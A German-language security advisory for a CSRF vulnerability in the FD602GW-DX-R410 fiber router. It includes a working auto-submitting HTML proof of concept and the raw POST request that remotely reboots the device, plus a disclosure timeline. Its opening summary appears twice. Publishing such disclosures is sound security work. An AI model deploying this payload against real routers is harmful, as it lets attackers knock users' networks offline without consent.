
Eine CSRF-Schwachstelle im Router FD602GW-DX-R410 ermöglicht es entfernten Angreifern, das Gerät über eine manipulierte POST-Anfrage an /boaform/admin/formReboot neu zu starten, wenn ein Administrator authentifiziert ist.
Proof of Concept und Sicherheitshinweis für eine Cross-Site-Request-Forgery-Schwachstelle (CSRF) in der Admin-Oberfläche des Glasfaser-Routers FD602GW-DX-R410 (Firmware V2.2.14). Der Hinweis beschreibt die Auswirkungen, den Angriffsvektor und Empfehlungen zur Behebung.
Eine CSRF-Schwachstelle im Router FD602GW-DX-R410 erlaubt es entfernten Angreifern, das Gerät über eine manipulierte POST-Anfrage an /boaform/admin/formReboot neu zu starten, wenn ein Administrator authentifiziert ist.
In der webbasierten Admin-Konsole des Glasfaser-Routers FD602GW-DX-R410 (Firmware V2.2.14) wurde eine Cross-Site-Request-Forgery-Schwachstelle (CSRF) entdeckt. Der Endpunkt /boaform/admin/formReboot erlaubt es, per POST-Anfrage einen vollständigen Neustart des Geräts auszulösen, ohne dass CSRF-Tokens oder eine Origin-Validierung erforderlich sind. Wenn ein authentifizierter Administrator eine schädliche Seite besucht, kann der Router ohne Zustimmung remote neu gestartet werden.
/boaform/admin/formReboot<html>
<!-- CSRF PoC - generated by Burp Suite Pro -->
<body>
<form action="http://192.168.1.1/boaform/admin/formReboot" method="POST">
<input type="hidden" name="postSecurityFlag" value="+65535" />
<input type="submit" value="Submit" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>
POST /boaform/admin/formReboot HTTP/1.1
Host: 192.168.1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 23
postSecurityFlag=+65535
HTTP 200 OK; Der Router startet sofort neu.
| Datum | Aktion |
|---|---|
| Jun 2025 | Schwachstelle entdeckt |
| Jun 2025 | Verantwortungsvolle Offenlegung versucht (keine Antwort) |
| Jul 2025 | CVE-ID bei MITRE angefordert |
| Jul 2025 | Advisory vorbereitet und Veröffentlichung ausstehend |
| Sep 2025 | CVE zugewiesen, Advisory veröffentlicht |
Dieses Advisory dient Bildungs- und Sicherheitsbewusstseinszwecken. Der Autor übernimmt keine Verantwortung für Missbrauch. Sämtliche Tests wurden in einer kontrollierten Umgebung durchgeführt.